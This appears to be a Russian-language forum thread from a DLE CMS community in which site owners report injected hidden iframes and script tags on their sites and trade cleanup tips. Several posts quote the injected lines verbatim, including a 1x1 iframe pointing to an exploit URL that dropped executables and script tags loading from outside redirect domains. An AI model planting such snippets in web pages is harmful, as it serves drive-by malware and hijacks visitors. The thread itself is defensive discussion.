Для счастливчиков, кто на у себя на сайте находит трояна и ifram`ы

[xsash 9]

Snow Land

я говорил про вирус образно.

я статью про них писал в секлабе, так что не надо блабла. что это такое я знаю. сам разрабатывал.

просто при изменении части кода сигнатура изменяется, а раз в базе нет - значит "не вирус"

[Гость Автоответчик]

<#thank#>

[mcaiZer77 0]

xsash,

5) поменяйте браузер с IE6

Перейти на него(если юзаете другой) или наоброт сойти(если юзаетен IE6)?

[Stude_nt 0]

mcaiZer77,

Лучше перейти на что нибудь типа Opera, т.к. всю пакость расчитывают на большенство (а это IE6)

[xsash 9]

конечно "С" него. опера лучше. ошибок для нее не было найдено уже достаточно долго в отличиие от FF.

ps. только полемику разводить не нужно у "кого длиннее". каждый выбирает сам

[sklazer 0]

Слушайте, а не может ли появиться iframe из-за того, что у админа null версия движка( это я не про себя, а про друга - он спрашивает )

[EVRIAL 0]

Слушайте, а не может ли появиться iframe из-за того, что у админа null версия движка( это я не про себя, а про друга - он спрашивает )

Конечно может. Доверяй, но проверяй.

[xsash 9]

а почему нет? просто ктото в нулл вставил код стучалки, вот ему она и будет отстукивать какой пароль у админа сайта с нуллом

[sergey78 18]

Народу становится все больше, тех кто понимает чтото в php и вообще сети (с точки зрения матчасти) все меньше. Вероятно тут есть обратная зависимость =\

Итак. если Вы нашли на своем сайте код типа

<iframe src=http://***/***/ex.php border=0 width=1 height=1></iframe>

или

<script src=http://***/load.js></script>

(иногда такой код просто зашифрован яваскриптами - для невозможности прочтения)

мои поздравления

Вот и у меня появился первый опыт. Сегодня нашел:

<!-- ~ --><iframe src='http://coco32.org/o/exp/' frameborder=0 width=1 height=1></iframe>

Он мне на рабочий стол добавлял файлы download.exe, googletoolbar.exe, cstike.exe....

Мусор удалил, пароли сменил, хостеру сказал.

Вопрос: где еще может быть такая гадость кроме index.php ?

Celsoft,

Почему не сделать в админке:

«Hello admin, последний раз вы заходили 12.03.2007 в 19:32 с IP 198.198.198.198»

Эта запись в базу делалась бы при логине админа. Должно работать нормально, если включен сброс авторизации (в новых версиях DLE).

[dmc 0]

Вопрос: где еще может быть такая гадость кроме index.php ?

у меня было в /engine/cache/system/banner.php

[Danila 8]

Читаем:

http://www.viruslist.com/ru/weblog

http://masterlink.art-neon.net/index.php?a...page;topic=30.0

Что бы такая бяка не портила скрипты, можно на них поставить chmod 444, по крайней мере на index.php, если его изменяете не часто.

[stud_muffler 0]

На двух ДЛЕ сайтах (в.5.0 и 4.0) iframe были прописаны после тэга body в файлах main.tpl во всех шаблонах.

[Alexandr 1]

А у меня иногда, где раз в два дня вылезит с верху сайта реклама Lovplenet да такой большой банер,

я страницу перезагружаю, и он исчезает и долго его не видно, подозреваю что это проблемы с хостером.

НУ если был бы фрейм он бы постоянно грузился

[Alexandr 1]

А у меня иногда, где раз в два дня вылезит с верху сайта реклама Lovplenet да такой большой банер,

я страницу перезагружаю, и он исчезает и долго его не видно, подозреваю что это проблемы с хостером.

НУ если был бы фрейм он бы постоянно грузился

Ксати сегодня этот прикол с тем же баннером ловплэнэта я увидел на 4dle.ru

Значит хостер воду мутит к нему и надо стучать. и еще странно у 4ДЛЕ другой хост а у меня другой.

[shoked 0]

это вроде бегун че то мутит... убрал его код, баннер пропал, короче хз

[Alexandr 1]

это вроде бегун че то мутит... убрал его код, баннер пропал, короче хз

Да ну бегун наврятли. Код ковсем в друго месте. да и не думаю что бегун будет себе репутацию портить и тем более что этот баннер вылазиет редко .

[shoked 0]

да точно он

[sergeant Raven 2]

это от бегуна вылазит...

[Alexandr 1]

shoked

как часто он вылазиет.

И вообще кто как думает бегун признается об этом или нет, если ему написать

[sergeant Raven 2]

вылазит по разному... от 3 раз в день до...

писать им не пробовал...

[leksey 0]

решил откапать старую тему

сайт www.rumontazh.ru, обновился до 9,2

все проверил антивирусом, но все равно при заходе на сайт при кликам по внутренним страницам происходит пересылка на другой сайт.

что за вирус сидит?

[celsoft 6 067]

leksey,

из своих шаблонов удаляйте скрипты, в частности

</script><script language="JavaScript" charset="windows-1251" src="http://livetraf.com/js/bodyclick.php?id=2194"></script>

[leksey 0]

leksey,

из своих шаблонов удаляйте скрипты, в частности

</script><script language="JavaScript" charset="windows-1251" src="http://livetraf.com/js/bodyclick.php?id=2194"></script>

Вроде не нашел никаких подозрительных скриптов, может не так смотрю

[zgr 72]

<script language="JavaScript" charset="windows-1251" rel="nofollow" src="http://under-click.net/js/if.php?id=7833"></script>

<script language="JavaScript" charset="windows-1251" src="http://livetraf.com/js/bodyclick.php?id=2194"></script>

Чего за мусор?

Сделал для своих нужд простенький сервис по пробивке всех нюансов (парсинг всего на сайте), позволяет быстро найти гадости, если таковые имеются, правда, не все работает еще, некогда заниматься, если устроит, юзайте в помощь: isle-arch.ru (пока только ссылки и меты).

Изменено 5 января 2011 пользователем zgr

[leksey 0]

leksey,

из своих шаблонов удаляйте скрипты, в частности

</script><script language="JavaScript" charset="windows-1251" src="http://livetraf.com/js/bodyclick.php?id=2194"></script>

Вроде не нашел никаких подозрительных скриптов, может не так смотрю

Или перефразирую вопрос, как это сделать?